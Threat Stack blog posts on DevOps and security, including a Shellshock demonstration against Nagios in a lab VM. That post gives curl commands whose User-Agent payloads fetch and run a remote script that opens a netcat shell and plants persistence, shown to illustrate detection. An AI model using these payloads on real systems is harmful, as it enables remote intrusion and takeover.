Bringing Infosec Into The DevOps Tribe: Q&A With Gene Kim

By Pete Cheslock, Senior Director, Operations and Support at Threat Stack 

Last week, I had a call with Gene Kim, founding CTO of Tripwire and author of The Phoenix Project (see end of post for more details). I've known Gene from the DevOps community for awhile now, so we took this time to dive into all things DevOps and Security, in the end resulting in this great Q&A to share with you all on what bringing Security into DevOps means for us all.

Gene kicked off our discussion with a few questions for me: 

Gene:  

How in the world did a nice DevOps person like you end up in the bowels of Infosec?  Usually it works the other way around -- the smart Infosec people flee to saner grounds like DevOps.

Pete:  

While looking for my next opportunity, I wasn’t looking specifically looking for a job in the Infosec field, or even at security specific companies, but after getting introduced to the leadership at Threat Stack, it definitely opened my eyes to a whole new world that I felt like I was missing out on.  After spending more time learning about the product and the marketplace, what I saw was actually a convergence of Infosec and DevOps much like we saw when Dev and Ops teams needed to fundamentally change their thought process in order to win.

What attracted me even more to this space, and the visibility that our product could facilitate, was that we could provide this service to companies that likely didn’t have a dedicated Security team to review and monitor system usage and access.   As we see more and more companies of all sizes undertake these cloud initiatives, deploying net-new projects into places like Amazon, Google and Azure, Infosec teams become new barriers to progress, in ways similar to the battles between Development and Operations.  I see a world where we can provide deep insight into services, users, and activities that these companies need, and provide this information to Devs, Ops and Infosec users of all kinds.  Furthermore, we can embed this visibility and monitoring into the workflow, allowing companies to deploy more  scalable and elastic infrastructure.

As companies move towards microservices and containerized deploys, it will be even more critical that the business is continually monitoring and analyzing the scope of changes to their systems.  These monitors can (and should) be integrated early in the development pipeline, as Developers and Operations engineers build these complex, distributed applications.

Gene:  

Here’s a quote from my good buddy Josh Corman:

“If there’s one message that everyone in Infosec should know about the DevOps community, it’s this:  DevOps is waiting for Infosec with open arms.  Come on in, the water is awesome.”

Do you agree with his thesis?

Pete:

It’s been an exciting time watching as DevOps and the overall community around that movement has matured over the past 5 years.  We’ve seen more and more companies of all sizes make amazing organizational changes and fundamentally shift how they do business online.  That being said, many engineers and technical leaders were resistant to that change, fearing “yet another buzzword.”  But these DevOps concepts have now been around long enough for people to see how companies have been able to complete these large transformations.  We’ve seen how to get teams with competing interests a set of shared goals and ideals in order to change how they get work done.

I see the same thing when it comes to the Infosec teams and security minded folks within companies.  At many of these companies, though, the Security teams don’t have a seat at the table.  They are getting shot down while the rest of the organization is making changes at an incredible rate.  

So how can we enable Security and Infosec teams to embrace this new world of continuous deployment and elastic infrastructure?  Much like we saw for the DevOps world, it will come down to a mixture of culture change and improved technical applications that will facilitate the integration of Infosec into DevOps.  Much like how Chef and Puppet enabled teams to more effectively build and deliver highly scalable systems, I see companies like Threat Stack poised to deliver the tools to allow deep insight and visibility into the applications and services being deployed.  

I then had some questions for Gene: 

Pete:  

It looks like enterprises like GE Capital, Macy’s, Target, and Nordstrom are early adopters of DevOps in the enterprise; how does Infosec need to change when more of the Dev to Ops value stream migrates to DevOps patterns?

Gene:

This is one of the most exciting things about hosting the DevOps Enterprise Summit.  We have over 50 leaders from large and complex organizations, just like you’ve mentioned, presenting about how they’ve transformed, and how Development, Operations and Infosec have worked together to replicate the amazing outcomes that we typically associate with the DevOps unicorns (e.g., Etsy, Google, Amazon, Netflix, etc.).

Of course, in reality, the unicorns are multi-billion dollar organizations and complex organizations in their own right.  However, when you’re an enterprise horse, you have to deal with very powerful and entrenched silos in Dev, Test and of course, Infseoc.

My belief is that we’re going to see the Infosec function transform just like QA/Test is transforming.  In other words, in high performing DevOps organizations, you very rarely see a QA department that is writing and running the tests.  Instead, QA is helping coach Dev on how to write good test cases and ensures that the right feedback loops exist so that Dev can validate that they’re achieving the functional and non-functional requirements (like Infosec, for example).

In this world, Infosec is not doing the security scans, nor is it pestering Dev and Ops to look at their reports.  Instead, they are helping create the automated tools so that Dev and Ops can get fast and constant feedback on whether the code and environment are achieving the security objectives.

My favorite example of this is the three-year transformation of the Twitter Infosec function, which started when the @BarackObama account was hacked, resulting in a FTC injunction, requiring that Twitter be secure for the next 15 years.  It’s an incredible story of how they integrated Infosec into the daily work of Dev and Ops, with the primary mission of not getting in their way.  

Pete:

So how are fast-growing companies implementing the DevOps principles of ownership and accountability while requirements for access tighten (SOC2/FISMA/PCI, etc)?

Gene:

It’s often said that the main obstacle for DevOps adoption in large enterprises is Infosec and Compliance, and you can hardly blame them.  For decades, both Dev and Ops seem to have done everything they could to fix security defects that are exposed late in the project lifecycle.

But what every Infosec and Compliance practitioner needs to know is that DevOps is the best thing in at least 20 years to happen to our field.

Here’s why:

  1. When Dev and Ops embrace DevOps principles, we fully embrace all the non-functional requirements, like performance, quality, reliability, and yes, security.

    We want to know when we’re writing or operating code or environments that aren’t secure.

  2. Because DevOps organizations are constantly doing deployments, and those deployments take minutes or hours, the “find to fix” cycle time is very short.  

    So the days of Dev or Ops taking nine months to get an urgent change into production, (or maybe a week if we break all the rules, often creating massive chaos and disruption), are coming to end.

  3. DevOps value streams that sustain tens, hundreds or even thousands of deployments per day (such as at Netflix, Etsy, Google, etc), can’t be done without a ton of effective controls.  
    In fact, if you count the number of controls that are working in their deployment pipelines (e.g., automated test suites, security scans, performance testing, manual peer review of changes, deployment validation, performance testing, etc.), you’ll find FAR MORE controls in a DevOps organization than in a traditional waterfall SDLC.

Wrapping Things Up

Gene Kim is hosting the DevOps Enterprise Summit in San Francisco from October 21st to 23rd. Use promo code “THREATSTACK20” for a 20% discount -- Expires 10/10!

Coming up in just one month, Threat Stack will be hosting Gene Kim at our booth during the AWS re:Invent Conference. Stop by booth #742 on Wednesday, November 12 from 11am-12:30pm to meet Gene and get your free signed copy of The Phoenix Project.

We look forward to seeing you at re:Invent!

 

CVE-2014-6271 And You: A Tale Of Nagios And The Bash Vulnerability

By Jen Andre, Co-Founder

The internet is yet again feeling the aftereffects of another “net shattering” vulnerability: a bug in the shell ‘/bin/bash’ that widely affects Linux distributions and is trivial to exploit. The vulnerability exposes a weakness in bash that allows users to execute code set in environment variables, and in certain cases allows unauthenticated remote code execution.

Possible vectors for attack include:

  • Authenticated SSH sessions: (think of a git server where a user may have ssh account access, but the ssh access is restricted, and suddenly that user is allowed to run commands on that box)

  • cgi scripts that invoke or use bash (by setting a HTTP header to code designed to exploit this vulnerability, you can get the web server to run code).

Already, real-life exploits are emerging and operations people everywhere are scrambling to patch up their Linux servers. Infrastructure that lives in the cloud especially is at risk, since the IP-ranges for Amazon and other cloud providers are already known, and these servers are already constantly being scanned and attacked by automated systems thousands of times on a daily basis.

At Threat Stack, we specialize in protecting Linux by providing deep-auditing and alerting on cloud Linux infrastructure, and as such I thought it would be interesting to demonstrate how a user could leverage this vulnerability in a real-life application via the cgi-bin attack vector.  

Naturally, when I asked myself the question: “what vulnerable web app do I know that still heavily uses cgi-bin scripts to drive their web application?”, Nagios first came to mind. ;) To create a scenario where I could demonstrate this bug, I set up a VM using a vagrant Nagios setup I found on Github, and installed the Threat Stack agent on that “server”.  

The first thing I did was set about reading the Nagios web user interface cgi-bin code to look for a possible attack vector. I quickly found a vulnerability that I could use to pair with the bash bug to provide a compelling exploit. If you drop a “ssi” file, e.g. “common-header.ssi”, the web app will execute that code in order to generate a custom header or footer (presumably for branding purposes or to include additional data), and does this by executing a “system()” call on that file:

Awesome! I dropped a simple bash script into “/usr/share/nagios3/htdocs/ssi/common-header.ssi” to set up conditions for my Nagios “exploit”:

I then crafted a simple “exploit” using curl, by setting my user agent to a string that would get executed by this script on my vulnerable server:

#!/bin/sh

curl -u "nagiosadmin:admin" -A "() { :; }; /usr/bin/curl -o /tmp/exploit.sh https://gist.githubusercontent.com/jandre/ed8ee7ddf1eb19622b3c/raw/3fe85938914c8d90e2d80568a2b9482384a6a680/gistfile1.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi   

curl -u "nagiosadmin:admin" -A "() { :; }; /bin/chmod 755 /tmp/exploit.sh http://192.168.133.10/cgi-bin/nagios3/summary.cgi   

curl -u "nagiosadmin:admin" -A "() { :; }; /tmp/exploit.sh" http://192.168.133.10/cgi-bin/nagios3/summary.cgi   

This exploit works as follows:

  • It makes a curl connection to the “summary.cgi” page served by Nagios.   

  • It sets the commands an attacker wanted to run in the User Agent string, which consisted of downloading a script and saving it to /tmp/exploit.sh, and running that script.  

  • The script itself contained some code that spawned a netcat shell binding to bash, added a cron job to make sure netcat is running, and also attempted to add an ssh key to the user’s home directory.

Running the exploit, I immediately saw some activity from Threat Stack about the network activity:  one alert about new process activity from netcat, and another about Nagios spawning a curl process:

Neither of these things are good! By pivoting into the details about the process that triggered  each alert, I was able to get a pretty good picture of what happened.  

The first thing I investigated was the netcat process, and used the Threat Stack “TTY timeline” which allows us to reconstruct what happened around that process:

Here, you can see Nagios running, then executing “common-header.ssi”, and “./tmp/exploit.sh” running leading up to spawning a netcat bind shell -- definitely not good! (Hint: the commands are listed in reverse order)

Walking up the process tree and seeing the processes spawned by the Nagios cgi-bin summary.cgi script confirmed this:

Though this exploit is admittedly contrived, it illustrates one of many attack vectors that could be leveraged in real-life applications that are widely used on Linux today.    

Lessons to be learned are:

  • Patch quickly! This is not a bug to be trifled with. It’s easy to exploit, and this bug is so new that we have no idea what other attack vectors will emerge in the near future.

  • Always be monitoring!  Who knows how long this vulnerability was actually known by nefarious parties. With proper monitoring, you have a good awareness of what network and application activity is happening on your box.   If your web server ever starts spawning a shell, this is a bad thing :)

Continue reading how security is more and more embedded within ops and best practices on how to do so, here

Threat Stack vs. Red Hat Auditd Showdown

By Jen Andre

One of things we like at Threat Stack is magic.  But since magic isn’t real, we have to come up with the next best thing, so we’ve hired one of the libevent maintainers Mark Ellzey Thomas (we like to call him our ‘mad kernel scientist’) to make our agent the best in its class. 

Many of the more savvy operations and security people that use our service are blown away by the types of information we can collect, correlate, and analyze from Linux servers. They say something to the effect of, “I’ve tried to do this with (Red Hat) auditd, with little to no success… how do you guys do it?”  

The Linux audit subsystem is a very powerful way to collect information about system calls and other security-relevant activity.  The best part: no kernel module is required to enable this detailed level of auditing since it’s built right into Linux. You have the option to write a log any time a particular system call happens, whether that be unlink or getpid.  Since the auditing operates at such a low level, the granularity of information is incredibly useful.

Traditionally, people have used the userland daemon ‘auditd’ built by some good Red Hat folks to collect and consume this data. However, there are a couple of problems with traditional open source auditd and auditd libraries that we’ve had to deal with ourselves, especially when trying to run it on performance-sensitive systems and make sense of the sometimes obtuse data that traditional auditd spits out. To that effect, we’ve written a custom audit listener from the ground up for the Threat Stack agent (tsauditd).

We’ve asked our agent engineer, Mark, to make a video that highlights the performance, parsing fixes, and other changes we’ve put in the Threat Stack agent by demonstrating a ‘showdown’ with Red Hat’s audit. You can view it in all of its glory here (Warning: Mark tends to ramble):

Here are a couple of highlights from the video, along with some other facts that make our audit listener special:

1. Performance Enhancements

Many people have tried to use traditional Red Hat auditd in production to do very detailed auditing of user, process, and network syscall activity, but have failed due to the performance impact. We’ve ensured that our agent is responsible with resource utilization through our unique parsing model. In fact, while benchmarking a web server, we saw auditd consume 120% of the CPU. Threat Stack's agent CPU consumption was only 10%!

2.  Output Enhancements

This Linux audit system is special, and by special, I mean it will output many different lines across disparate events into syslog, which you then have to correlate later via your ingestion engine or your log management system.  The key-value format is also cumbersome to parse, and values are often encoded into hex randomly. We’ve decided that all related events should be grouped together and have conveniently parsed everything correctly for you. We then transformed that to a JSON output format that is much simpler to read and parse.

3. Network Tooling ("src/dst port")

Tracking network connections across multiple hosts can be a manual and painful process when trying to connect across boxes. To make it easier, our agent adds metadata to network connection events to determine where the connection is originating from and where it is going. Our backend is then able to correlate these network events to determine the originating process and potential user activity that caused that network event, so long as the agent lives on both the source and destination server.

This is especially useful for tracking SSH sessions across your environment and debugging what servers are speaking to one another and why.

4.  User Activity Auditing

Digging around the server logs to see where a user on your system went is not an easy job. You’d need to manually find the agent and session that a user connected to, yet all the kernel gives us is a nasty hex encoded string representing the connection address in the traditional auditd logs. On top of that, most of the information logged by auditd is not really relevant, and hard for the human eye to parse. To correct that, we’ve designed Threat Stack to keep storage of events, activity, and commands associated with a logged in user, and automatically reconstruct this information into a clean, compact, and readable timeline.

Stay tuned to read about some of the other engineering feats we are accomplishing at Threat Stack!

8 Patterns For Continuous Code Security

Guest post by Chris Wysopal, CTO at Veracode 

This is the fifth installment in our series of weekly blog posts that dives into the role of SecDevOps. This series looks into why we need it in our lives, how we may go about implementing this methodology, and real life stories of how SecDevOps can save the Cloud.

 

Best practices of secure agile teams

According to the 2014 Verizon Data Breach Investigations Report (DBIR), web applications are the #1 attack vector leading to data breaches.

So deploying insecure web applications into production can be risky -- resulting in potential loss of customer data, corporate intellectual property and/or brand value.

Yet many organizations still deploy public-facing applications without assessing them for common and easily-exploitable vulnerabilities such as SQL Injection and Cross-Site Scripting (XSS).

Why?  Because traditional approaches to application security are typically complex, manual and time-consuming – deterring agile teams from incorporating code analysis into their sprints.

But it doesn’t have to be that way.  By incorporating key SecDevOps concepts into the Software Development Lifecycle (SDLC) – including the use of cloud-based services with API-driven automation, centralized policies and tighter collaboration and visibility between security and DevOps teams – we can now embed continuous code-level security and assessment into our agile development processes.

In our own development environment, Veracode has adopted secure agile processes with the goal of rapidly delivering code without sacrificing security. Along the way we’ve uncovered eight patterns that lead to successful secure agile development.

These eight patterns work together to transform cumbersome waterfall methodologies into efficient and secure agile development.

1. Think like a developer.

In agile environments, developers write code based on work committed in the current sprint. At various points in the process, our developers upload code to Veracode’s cloud-based application security service, directly from their IDEs. The code is then analyzed and the results downloaded to their development environments, allowing them to address vulnerabilities before check in. By finding vulnerabilities during coding instead of during a separate security hardening sprint, developers need not switch context to work on code written long ago. This saves both time and velocity.

2. Find it early. Fix it early.

Too often, security testing is only implemented at the end of a sprint, as a pre-deployment gateway or checkpoint. This approach requires a separate security hardening sprint after the team has delivered a functionally-complete release candidate. This results in a hybrid waterfall/agile process instead of enabling the best practice of agile — completing all the work during the sprint.

In comparison, frequent assessments allow the team to identify and remediate release blockers early in the cycle — when they’re easier and less expensive to fix. This also reduces the overall risk of successful delivering the team’s payload. It only works because most Veracode assessments finish within hours or overnight (in fact, 80% of assessments for Java and .NET applications are completed in less than 4 hours). That means that continuous security assessments can fit into a one to two week sprint that’s typical in many development organizations.

3. Use multiple analysis techniques for optimum coverage and accuracy.

The appropriate combination of multiple analysis techniques — ideally in a single centralized platform with consistent policies, metrics and reporting — gives organizations the broadest view of application security.

Binary static analysis – also known as “white box testing” or “inside out testing” – analyzes data and control paths without actually executing the application, looking for vulnerabilities such as SQLi and XSS.

In comparison, dynamic analysis (DAST) – also known as “black box” or “outside in” testing – identifies exploitable vulnerabilities at runtime, during pre-production QA/staging.

Manual penetration testing looks for vulnerabilities that can only be found by humans, such as Cross-Site Request Forgery (CSRF) or business logic issues.

Of course, most modern applications aren’t built from scratch but rather assembled from a mixture of custom code and open source components and frameworks. Software composition analysis (SCA) is a handy way of identifying which components are used where – and which are known to be vulnerable.

4. Automate to blend in.

Blending in with developers’ automated toolchains means leveraging tools they already use. Automation inside the IDE (Eclipse) is used to build, upload, scan and then download results, which are shown against the code inside the editor for easy remediation. Automation at the team or release candidate stage allows the build server (Jenkins) to automatically upload build artifacts for assessment, using Veracode APIs. API-driven automation in the bug tracking system (JIRA) downloads results and manages the vulnerability lifecycle. Tickets for vulnerabilities are then triaged through the same process used for all bugs. When security assessments are blended in, developers don’t switch context – and they work more efficiently.

5. Play in the sandbox.

The sandbox is a way for individual developers or teams to assess new code against the organization’s security policy, without affecting policy compliance for the current version. One way to think about an assessment sandbox is to consider it as a branch inside the application. Developers can scan the branch and understand whether it would pass the current policy. Each team can also have a sandbox for merging multiple branches to assess the integration.

6. Avoid replicating vulnerabilities.

If you think about how developers work, there’s always a bit of copy-and-paste going on. Developers look at code and say, “All right, I’m going to use that pattern.” When vulnerabilities get replicated across the code base, it magnifies risk across projects. Then it becomes a big development effort – “security debt” – to clean up those vulnerabilities.

7. Learn from constant feedback.

Direct interaction between developers and detailed vulnerability feedback enables self-reflection. People begin to see their own coding habits and gain insight into how to develop more secure ones. The “aha” moment comes when a developer says “Oh, I shouldn’t have coded it this way because as soon as I upload it I’m going to see the same results.” Continuous feedback means they’re more likely to reuse secure patterns and avoid insecure ones.

8. Be transparent about security risk via policies.

We use labels to identify any vulnerability that violates our standard corporate security policy (such as “No OWASP Top 10 Vulnerabilities”) as a release blocker. This raises our visibility into vulnerabilities and allows us to triage every application-layer threat before release. Triage involves answering questions such as: Do we need to remediate this vulnerability? Can we mitigate it instead, and if so, how? Is this a risk we’re willing to accept? Visibility enables a pragmatic discussion about risk within the normal agile sprint management process.

Adopting these eight patterns has helped Veracode become more efficient, secure and successful in delivering code with short delivery cycles – without sacrificing security.

Stay tuned next Wednesday for our sixth installment in this series as we continue to dive deep into SecDevOps implementation. 

 

About Chris Wysopal 

Chris Wysopal, co-founder and CTO of Veracode, is recognized as an expert and a well-known speaker in the information security field. He has given keynotes at computer security events and has testified on Capitol Hill on the subjects of government computer security and how vulnerabilities are discovered in software. At Veracode, Mr. Wysopal is responsible for the security analysis capabilities of Veracode technology. He can be found on twitter as @WeldPond.

 

How DevOps and Models Enhance Behavioral Detection

By Aaron Botsis

This is the fourth installment in our new series of weekly blog posts that dives into the role of SecDevOps. This series looks into why we need it in our lives, how we may go about implementing this methodology, and real life stories of how SecDevOps can save the Cloud.

 

In an earlier article, Behavioral Threat Monitoring Without Models, I explained how you could use our Cloud Sight product to deploy a pre-trained behavior model on newly deployed systems. For the fourth installment of this SecDevOps series, I’m going to talk about how to further integrate security into DevOps processes and how these models work together in the bigger picture.

What are these models?

Ok, ok. I keep saying “models”, but what are they? How do they work? And most importantly, why do they matter?

We can use models to detect changes in system behavior with algorithms and math; Cloud Sight actually builds several different types of these models. The great thing is that the models don't even need to be that complicated. Why?

If you have any data scientist friends:

1. They’ll tell you that more data beats a better algorithm.

2. Wait, data scientists have friends?

So what can we do with more data? Let’s start with “processes with network activity”. For any group of servers, Cloud Sight builds a list of processes that are talking on the network. Once it’s finished learning, it starts to monitor for new processes. This is a simple but extremely effective technique to identify behavior variations. In fact, it’s so effective that in a 28M event sample set of accept(2) and connect(2) system calls, we saw just 321 unique executable names across our customers! We can apply similar techniques for other data such as process owner, parent process name, etc.

Why this is Good

Back in the dark ages, it was difficult to ensure a group of systems that were functionally similar actually behaved in a consistent and similar way. But then there was light. Thanks to DevOps and configuration management, system behavior is now a fairly consistent (and measurable) thing. Web servers that are all configured the same actually do the exact same thing, the exact same way. This is an epic win for security, my hipster brethren!

“I took this system to its maximum potential. I created the perfect system!”  

“I took this system to its maximum potential. I created the perfect system!”

 

“Epic Win?"

Totally. Here’s why: Imagine these models can be created, destroyed and tested programmatically, alongside your existing development processes.

We can start by training these models during our continuous integration tests. We know the environment is pristine, and we’re already testing all of the things. Why not train our models which behavior is “good” while we’re at it? It’s like a self-generating, infrastructure-wide whitelist.

Now we can apply those behaviors to systems we deploy for production. Anything that deviates from what we tested is likely an intrusion. But even if it’s not, it could inform us of imperfections in the system. Maybe we forgot to test something. Maybe there’s a corner case that only affects production for some reason. Maybe something’s running away because of an unidentified failure elsewhere in the system, consuming precious elastic resources.

Finally, once we’ve iterated and ironed everything out, we can add automated chaos-monkey style remediation to the mix. When a system deviates from it’s expected behavior, quarantine and replace it automatically.

Bringing it all Together

It used to be that “deploy” meant “run make install”. The number of interaction points between applications was minimal and easy to grok. Today's infrastructures are more complex than ever, and DevOps is showing huge value in quick iteration. Thanks to configuration management, applications and the infrastructure supporting them are more consistent than ever. So it only makes sense to leverage behavioral monitoring to iterate quickly without forgetting lessons learned from the past while protecting the infrastructure at the same time.

Stay tuned for next week’s SecDevOps blog post featuring Chris Wysopal, Veracode’s CTO, on code analysis as part of CI.

Who Gets Access to Production?

By Sam Bisbee, CTO

This is the third installment in our new series of weekly blog posts that dives into the role of SecDevOps. This series looks into why we need it in our lives, how we may go about implementing this methodology, and real life stories of how SecDevOps can save the Cloud.

Remote access to production machines is a long contested battlefield that has only gotten uglier since the rise of Software as a Service, which has obliterated the line between building the system and running the system. This caused new methodologies to be enacted, the most popularly touted being DevOps, which is really just an awful way of communicating that everyone is responsible for running the system now. One critical implementation detail that smaller SaaS companies have always understood due to hiring constraints is that the entire technical staff is required to be on call. Yes, even the engineers, developers, or whatever else you call them.

The New Policy

“Lock out the developers” is not an acceptable policy anymore. Developers inherently build better systems when they experience running them. Who would allow a bug to linger if it continuously woke them up throughout the night? This pain was not felt widely enough in the previous “throw it over the wall to operations” world. I can sense desperation rising from the PMs over their kanban story velocity, “If an engineer is on call, then they won’t be able to write code!” While this statement is factually accurate, the sentiment is not.

First, operations has an equally important and lengthy work queue. Second, those paging alerts are likely the most important bugs regardless of whether they’re an uncaught exception (engineering issue) or RAID alarm (operational issue). This typically confounds those new to the SaaS world because they have not fully grasped the ramifications of the Service with a capital “S”. The Service is always on and is the product through which you deliver value. This is one of the best examples of how SaaS companies are so much different culturally and operationally than companies that “ship” product. You are not running an IT department.

Don’t Over Correct

This remote access policy may seem like an over correction, which is why proper controls are critical. One of the most cited fears for granting more people access is the lack of change control. When you apply this fear to developers, what people really mean is that they are afraid of hot patches. This is completely and utterly reasonable.

Hot patches decrease visibility into the system, slowing down or outright preventing the ability to debug. The worst-case scenario is a hot patch actually damaging the system or corrupting user data, which is exponentially more likely due to the lack of testing. The technical community should fully understand by now that “it worked on my laptop” or “it shouldn’t do that” are not reasonable statements when releasing. The only true prevention for hot patching, especially when implementing a populist remote access policy, is to create a frictionless release mechanism. Make it trivial for your teams to build, test, and initiate a staggered release into any of your environments. Ideally your build server is testing every push to your master git branch and anyone can promote a successful build from that server.

Trust but Verify

If frictionless releases are our trust, then accordingly we must verify. Enter monitoring. Techniques such as the Pink Sombrero are good (digital sombreros are better), but you must introduce continuous security monitoring into your environment. For ages there have been tools and techniques that do this, but most teams do not employ them because of their complexity, outdated implementation (taking hashes of your entire multi-TB filesystem in an IO bound cloud or virtual environment is asinine), and volume of false positives. It does not have to be so complicated though. For example, alerting when a user other than chef changes files in your production server’s application directory is an easy first step that a team of any size can easily grasp.

For those who are concerned about access to customer data, whether it be PII or something less toxic, this remote access policy does not apply to that data, as it should live in a segregated environment. They are also likely concerned with passing audits, and the prospect of listing their entire technical team as having production access is not intriguing. In such scenarios, non-operators should be locked out of production unless they are on rotation. Adding and revoking their SSH public key from the gateway on-demand can make controlled access easier.

You Get What You Need

All of this is to say that collectively we are still trying to figure out the security balance in the technical community. Too often people want security, but see it as prohibiting productivity so they punt. This is unfortunate for the obvious reasons, but also because properly operationalized security begins to enhance the developer’s and operator’s experience. Tools are leveraged that make the system easier to run and control. Different monitoring solutions are installed that make the system easier to debug and verify. And, everyone gets access to production.

Stay tuned next Wednesday for our fourth installment in this series as we continue to dive deeper. Until then, be sure to check out our first and second posts in the series.

Threat Stack Names Executives As Company Brings Innovative Cloud Security Service to Market

We're excited to announce today that we have added several key members to our management team.  Sam Bisbee has joined as CTO; Chris Gervais as VP, Engineering; and Pete Cheslock as Senior Director, Operations and Support.

“Threat Stack is at a really exciting point in time, as we come off a highly successful beta program and prepare to launch Cloud Sight into the market. Our management team has deep experience across enterprise, cloud, SaaS and security, and a track record for successfully bringing innovation to market.  Were thrilled to have attracted an all-star team.”

- Doug Cahill, CEO of Threat Stack

About the Executive Team

Sam Bisbee is a senior technologist that brings experience and expertise in delivering highly scalable distributed systems via SaaS.  Most recently Sam was CXO of Cloudant, a leader in Database as a Service (DBaaS) technology; before that he held key technology positions at Bocoup and Woopid.

Chris Gervais has led technology teams developing large, scalable, enterprise-grade solutions and bringing SaaS offerings to market.  Before Threat Stack, Chris was CTO and SVP, Engineering at LifeImage, a platform for securely sharing medical images; and VP, Engineering at Enservio, a SaaS application and analytics platform for insurance carriers.

Pete Cheslock has a record of supporting SaaS customers with highly reliable and scalable solutions.  Pete was previously Director of DevTools at Dyn, a provider of network traffic management and assurance solutions; and before that he was Director of Technical and Cloud Operations for Sonian, a cloud-based archiving platform.

“This team is a testament to Threat Stacks unique technology and the big problem that it addresses. Elastic and dynamic infrastructures, and the services that run on them, are really difficult to monitor and protect.  Threat Stack has cracked the code.” 

- Chris Lynch, Chairman of the Board and a partner at Atlas Venture

Our flagship product, Cloud Sight™, is the first and only intrusion detection SaaS offering purpose-built to provides elastic cloud infrastructure with comprehensive protection, detection and response against malicious threats.  Cloud Sight has been in a highly active beta program which resulted in multiple customer case studies, including Populi, a cloud-based college administration platform, and University of Hawaii at Manoa CollegeBeta participation ranged from SaaS vendors to MSPs and enterprises running in most major cloud service providers including Amazon Web Services and Rackspace, as well as in private and hybrid-cloud deployments. Cloud Sight will be commercially available this fall.

Interested in trying out Threat Stack? Request an invite to our beta: https://www.threatstack.com/request